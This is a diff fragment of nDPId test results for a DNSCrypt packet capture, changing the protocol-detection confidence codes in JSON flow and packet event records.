+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAIc+mNAAL0R9vcKAAABrGhdUOhhBaMCCMyOtDcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAXc+mQgAL0REzcKAAABrGhdUN5GBaMGBBOttDgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":185,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739306241} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":185,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAABQ+mQAub0ROAoKAAABrGhdUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":946739306433,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":361,"pkt_l4_len":327,"thread_ts_msec":946739306433,"pkt":"ZmZmZmZmRERERERECABFAAFbc7kAADgRQ2SsaF1QCgAAAQWjwWgBRx3ktDmBgAABAAIAAAAAATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABwAwAEAABAAAAAAB9fEROU0MAAgAARetMpee6oZgp6bqFLigcb0SLVmyPyCbHZR6HuGkwY4G1zZ8bDjrU7\/iD1UD40EN1uvlcdqls0BZMl43HwVwZARZAkJHggho4ekmN0Zb884jA2erV10Cju7fjg6Pz8KRbF0CQkeCCGjhfU2UoX1NlKF9UtqjADAAQAAEAAAAAAH18RE5TQwABAACIFa1N+k0s+4iBtwxUZ\/VXDn6QTrqbz7JAjEb6C42munCjxleQqYGFgM5AgV1cY1L\/xiUTddAkkuTfkcOlN9YEFkCQkeCCGjh6SY3RlvzziMDZ6tXXQKO7t+ODo\/PwpFsWQJCR4IIaOF9TZShfU2UoX1S2qA=="} @@ -369,34 +369,34 @@ 00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":946739306435,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":361,"pkt_l4_len":327,"thread_ts_msec":946739306435,"pkt":"ZmZmZmZmRERERERECABFAAFbc74AADgRQ1+saF1QCgAAAQWj3kYBRwEHtDiBgAABAAIAAAAAATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABwAwAEAABAAAAAAB9fEROU0MAAgAARetMpee6oZgp6bqFLigcb0SLVmyPyCbHZR6HuGkwY4G1zZ8bDjrU7\/iD1UD40EN1uvlcdqls0BZMl43HwVwZARZAkJHggho4ekmN0Zb884jA2erV10Cju7fjg6Pz8KRbF0CQkeCCGjhfU2UoX1NlKF9UtqjADAAQAAEAAAAAAH18RE5TQwABAACIFa1N+k0s+4iBtwxUZ\/VXDn6QTrqbz7JAjEb6C42munCjxleQqYGFgM5AgV1cY1L\/xiUTddAkkuTfkcOlN9YEFkCQkeCCGjh6SY3RlvzziMDZ6tXXQKO7t+ODo\/PwpFsWQJCR4IIaOF9TZShfU2UoX1S2qA=="} 00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":946739306435,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":361,"pkt_l4_len":327,"thread_ts_msec":946739306435,"pkt":"ZmZmZmZmRERERERECABFAAFbc7wAADgRQ2GsaF1QCgAAAQWjlYsBR0nFtDWBgAABAAIAAAAAATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABwAwAEAABAAAAAAB9fEROU0MAAgAARetMpee6oZgp6bqFLigcb0SLVmyPyCbHZR6HuGkwY4G1zZ8bDjrU7\/iD1UD40EN1uvlcdqls0BZMl43HwVwZARZAkJHggho4ekmN0Zb884jA2erV10Cju7fjg6Pz8KRbF0CQkeCCGjhfU2UoX1NlKF9UtqjADAAQAAEAAAAAAH18RE5TQwABAACIFa1N+k0s+4iBtwxUZ\/VXDn6QTrqbz7JAjEb6C42munCjxleQqYGFgM5AgV1cY1L\/xiUTddAkkuTfkcOlN9YEFkCQkeCCGjh6SY3RlvzziMDZ6tXXQKO7t+ODo\/PwpFsWQJCR4IIaOF9TZShfU2UoX1S2qA=="} 00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":946739306435,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":361,"pkt_l4_len":327,"thread_ts_msec":946739306435,"pkt":"ZmZmZmZmRERERERECABFAAFbc7sAADcRRGKsaF1QCgAAAQWjo0gBRzwJtDSBgAABAAIAAAAAATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABwAwAEAABAAAAAAB9fEROU0MAAgAARetMpee6oZgp6bqFLigcb0SLVmyPyCbHZR6HuGkwY4G1zZ8bDjrU7\/iD1UD40EN1uvlcdqls0BZMl43HwVwZARZAkJHggho4ekmN0Zb884jA2erV10Cju7fjg6Pz8KRbF0CQkeCCGjhfU2UoX1NlKF9UtqjADAAQAAEAAAAAAH18RE5TQwABAACIFa1N+k0s+4iBtwxUZ\/VXDn6QTrqbz7JAjEb6C42munCjxleQqYGFgM5AgV1cY1L\/xiUTddAkkuTfkcOlN9YEFkCQkeCCGjh6SY3RlvzziMDZ6tXXQKO7t+ODo\/PwpFsWQJCR4IIaOF9TZShfU2UoX1S2qA=="} -00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305453,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305459,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305460,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305461,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305453,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305459,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305460,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305461,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739306435,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":946739311153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739311153,"pkt":"REREREREZmZmZmZmCABFAAIctEJAAL0RBKQKAAABzbl0dJXNAikCCAUEnScBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311153,"flow_last_seen":946739311153,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311153,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 